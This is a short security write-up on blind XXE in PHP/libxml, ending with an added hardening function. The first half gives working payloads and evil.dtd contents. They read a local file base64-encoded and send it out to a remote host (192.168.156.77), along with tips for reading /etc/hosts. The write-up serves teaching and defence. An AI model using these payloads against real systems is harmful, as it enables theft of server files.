
A few details of blind XXE


Since libxml 2.9.0, external entity resolution is disabled by default, so a parameter has to be passed to enable it.

<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt">
<!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd">
%remote;
%all;
]>
<c>&send;</c>
EOF;

// re-enable the external entity loader (off by default since libxml 2.9.0)
libxml_disable_entity_loader(false);
// LIBXML_NOENT makes the parser substitute entities
$data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
#print_r($data);

Contents of evil.dtd:

<!ENTITY % all
"<!ENTITY send SYSTEM 'http://192.168.156.77/?%file;'>"
>

<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt">
<!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd">
%remote;
%send;
]>
<c></c>
EOF;

libxml_disable_entity_loader(false);
$data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
#print_r($data);

Contents of evil.dtd for this variant (&#37; stands in for % so that a parameter entity can be declared inside the entity value):

<!ENTITY % all
"<!ENTITY &#37; send SYSTEM 'http://192.168.156.77/?%file;'>"
>

If an error like the following appears, try reading /etc/hosts instead; it is probably a protection against exponential expansion attacks that limits the length of the content.

Detected an entity reference loop in http://192.168.125.133:8081/evil.dtd
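For the defending side, the property the post relies on (external entities only resolve when the application re-enables the loader and passes LIBXML_NOENT) is also the fix. The following is an added hardening example, not code from the original post: it keeps entities unexpanded, installs an entity loader that resolves nothing, forbids network access during parsing, and refuses any document that carries a DOCTYPE at all, which is the only place entities can be declared. The function name parseUntrustedXml and the sample inputs are constructed for this example; the payload-shaped input reuses the post's own URL. Note that libxml_disable_entity_loader() is deprecated as of PHP 8.0, so the example does not call it.

```php
<?php
// Added hardening example (not from the original post): parse untrusted XML
// without resolving entities and reject any document that declares a DOCTYPE.

declare(strict_types=1);

/**
 * Parse $xml safely. Returns the DOMDocument on success; throws on a
 * DOCTYPE/ENTITY declaration or on a parse error.
 */
function parseUntrustedXml(string $xml): DOMDocument
{
    // Cheap pre-check: entities can only be declared inside a DOCTYPE, so a
    // document that needs none of that should never contain one.
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        throw new InvalidArgumentException('XML with a DOCTYPE/ENTITY declaration is not accepted');
    }

    // Belt and braces: even if libxml were asked to load a DTD or external
    // entity, resolve nothing. Returning null from the loader fails resolution.
    libxml_set_external_entity_loader(static function ($public, $system, $context) {
        return null;
    });

    $previous = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // No LIBXML_NOENT and no LIBXML_DTDLOAD: entities stay unexpanded and no
    // DTD is fetched. LIBXML_NONET additionally forbids network access.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if ($ok === false) {
        $message = isset($errors[0]) ? trim($errors[0]->message) : 'unknown error';
        throw new RuntimeException('XML parse error: ' . $message);
    }

    // Second check on the parsed tree, in case the string check was dodged by
    // an encoding trick (e.g. UTF-16 input that does not contain "<!DOCTYPE").
    foreach ($dom->childNodes as $child) {
        if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new InvalidArgumentException('DOCTYPE node present after parsing');
        }
    }

    return $dom;
}

// Constructed inputs: a harmless document and one shaped like the post's payload.
$benign = '<?xml version="1.0"?><c>hello</c>';
$withDoctype = '<?xml version="1.0"?>'
    . '<!DOCTYPE ANY [<!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd">%remote;]>'
    . '<c></c>';

echo parseUntrustedXml($benign)->documentElement->textContent, PHP_EOL;

try {
    parseUntrustedXml($withDoctype);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The string pre-check alone is not enough on its own (encoding tricks can hide the literal `<!DOCTYPE`), which is why the function also inspects the parsed tree for a DOCTYPE node; the two checks together, plus never passing LIBXML_NOENT, close both the classic and the blind out-of-band variants shown above.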
